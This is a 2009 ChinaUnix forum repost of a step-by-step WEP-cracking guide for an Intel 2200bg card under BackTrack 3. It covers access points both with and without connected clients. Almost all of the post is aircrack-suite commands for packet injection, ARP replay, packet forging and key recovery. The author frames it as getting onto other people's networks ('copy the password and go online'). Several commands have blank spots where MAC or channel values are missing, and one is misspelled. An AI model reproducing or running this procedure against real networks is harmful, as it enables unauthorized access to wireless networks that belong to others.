Chinaunix

标题: INTEL 2200bg实现注入式破解wep(有客户端和无客户端) [打印本页]

作者: appig    时间: 2009-08-09 16:29
标题: INTEL 2200bg实现注入式破解wep(有客户端和无客户端)

INTEL 2200bg实现注入式破解无客户端wep
airmon-ng start eth1(电脑不同,接口有可能为eth0,下同)
modprobe ipw2200 rtap-iface=1
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
ifconfig eth1 up hw ether
airodump-ng --ivs -w 1 -c 6 eth1
aireplay-ng -4 -e AP的essid -a AP的mac -h  -i rtap0 eth1
packetforge-ng -0 -a AP的mac -h  -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-*.xor -w rap
其中,replay_dec-*.xor为你得到的xor文件的全称,可用ls命令查看,然后拷贝、粘贴过来,-w后面跟的tqp是文件名,可以随便选取。
aireplay-ng -2 -r rap eth1 (这个命令里的rap必须和上条命令里的rap一样)
aircrack-ng -n 64 *.ivs (*.ivs可以通过ls命令查看,也可以直接输入*.ivs,此时,程序将分析你root文件夹里存储的所有ivs文件)
INTEL 2200bg实现注入式破解有客户端wep
1;打开窗口,输入
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
2;
iwconfig eth1 ap  
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
3;
fconfig eth1 up
ifconfig rtap0 up
4;
airodump-ng --channel  --bssid  -w dumpfile rtap0
这时你观察station下面是不是有对方的机器,如果客户端有在上网,那么station下面就会有对方的MAC,记下来。
5; 打开新的窗口,输入
aireplay-ng --arpreplay -b  -h 客户机的 MAC> -i rtap0 eth1
此时如果对方有客户端在上网,那么DATA的数据会增加,我刚才的情况是有客户端,但是RXQ信号很弱,差不多只有13左右,10分钟才增加了300个date,不过10分钟后RXQ超过50,接着DATA极速增加,此时在第5步打开的窗口中,ARP得到的数据也会同时增加。
6; 当DATA超过100000后,打开新的窗口,输入
aircrack-ng -z -b  dumpfile*.cap
然后就大功告成,抄下密码,上网去吧,嘿嘿。
上面就是BT3光盘启动下,最简单的破解有客户端WEP的全部过程,如果信号好的话,估计也就10来分钟搞定。
Ps;上面命令中的是不需要的。





本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u/11570/showart_2022604.html




欢迎光临 Chinaunix (http://bbs.chinaunix.net/) Powered by Discuz! X3.2